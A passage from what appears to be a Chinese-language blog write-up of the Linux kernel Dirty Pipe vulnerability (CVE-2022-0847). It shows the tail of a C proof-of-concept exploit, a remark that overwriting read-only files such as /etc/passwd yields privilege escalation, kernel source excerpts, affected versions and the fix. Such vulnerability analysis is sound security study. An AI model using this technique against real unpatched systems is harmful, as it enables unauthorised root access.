		printf("[x] write failed!\n");
		exit(1);
	}
	if (n < data_size) {
		printf("[x] short write!\n");
		exit(1);
	}
	printf("[+] write done!\n");
	exit(0);
}

验证:

image-20221111222643104

可以看到 ,我们确实修改了一个仅有可读权限的文件,在实际运用中,可以利用此来进行覆写/etc/passwd 从而达到提权的目的。

调试的时候

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
/*
 * copy_page_from_iter - copy up to @bytes bytes from iterator @i into @page,
 * starting at @offset within the page.
 *
 * Returns the number of bytes copied. Returns 0 if page_copy_sane() rejects
 * the request, or (after WARN_ON) if the iterator is of none of the kinds
 * handled below.
 */
size_t copy_page_from_iter(struct page *page, size_t offset, size_t bytes,
			 struct iov_iter *i)
{
	if (unlikely(!page_copy_sane(page, offset, bytes)))
		return 0;
	if (likely(iter_is_iovec(i)))
		return copy_page_from_iter_iovec(page, offset, bytes, i);
	if (iov_iter_is_bvec(i) || iov_iter_is_kvec(i) || iov_iter_is_xarray(i)) {
		void *kaddr = kmap_local_page(page); /* virtual address of the mapped page */
		size_t wanted = _copy_from_iter(kaddr + offset, bytes, i);
		kunmap_local(kaddr);
		return wanted;
	}
	WARN_ON(1);
	return 0;
}

50d7be724a1d856240aade69e52311d

e3f56d62659f747d222b77528e5614d

影响版本以及修复

  • 5.8 <= Linux kernel < 5.16.11
  • 5.8 <= Linux kernel < 5.15.25
  • 5.8 <= Linux kernel < 5.10.102

修复:

在 copy_page_to_iter_pipe 以及 push_pipe 中为新的 pipe_buffer 添加 buf->flags = 0 的初始化代码即可。

参考资料

https://www.cnblogs.com/yangjiguang/p/6030423.html

https://zhuanlan.zhihu.com/p/362499466

https://cloud.tencent.com/developer/article/1922497

https://blog.csdn.net/youzhangjing_/article/details/124967518

https://cloud.tencent.com/developer/article/1848933

https://arttnba3.cn/2022/03/12/CVE-0X06-CVE-2022-0847/#pipe%EF%BC%9A%E7%AE%A1%E9%81%93

https://zhuanlan.zhihu.com/p/83398714#:~:text=%E5%9F%BA%E4%BA%8E%20splice%20%E7%B3%BB%E7%BB%9F%E8%B0%83%E7%94%A8%E7%9A%84%E9%9B%B6%E6%8B%B7%E8%B4%9D%E6%96%B9%E5%BC%8F%EF%BC%8C%E6%95%B4%E4%B8%AA%E6%8B%B7%E8%B4%9D%E8%BF%87%E7%A8%8B%E4%BC%9A%E5%8F%91%E7%94%9F%202%20%E6%AC%A1%E4%B8%8A%E4%B8%8B%E6%96%87%E5%88%87%E6%8D%A2%EF%BC%8C0%20%E6%AC%A1%20CPU%20%E6%8B%B7%E8%B4%9D%E4%BB%A5%E5%8F%8A,DMA%20%E6%8E%A7%E5%88%B6%E5%99%A8%E5%B0%86%E6%95%B0%E6%8D%AE%E4%BB%8E%E4%B8%BB%E5%AD%98%E6%88%96%E7%A1%AC%E7%9B%98%E6%8B%B7%E8%B4%9D%E5%88%B0%E5%86%85%E6%A0%B8%E7%A9%BA%E9%97%B4%EF%BC%88kernel%20space%EF%BC%89%E7%9A%84%E8%AF%BB%E7%BC%93%E5%86%B2%E5%8C%BA%EF%BC%88read%20buffer%EF%BC%89%E3%80%82.%20CPU%20%E5%9C%A8%E5%86%85%E6%A0%B8%E7%A9%BA%E9%97%B4%E7%9A%84%E8%AF%BB%E7%BC%93%E5%86%B2%E5%8C%BA%EF%BC%88read%20buffer%EF%BC%89%E5%92%8C%E7%BD%91%E7%BB%9C%E7%BC%93%E5%86%B2%E5%8C%BA%EF%BC%88socket%20buffer%EF%BC%89%E4%B9%8B%E9%97%B4%E5%BB%BA%E7%AB%8B%E7%AE%A1%E9%81%93%EF%BC%88pipeline%EF%BC%89%E3%80%82.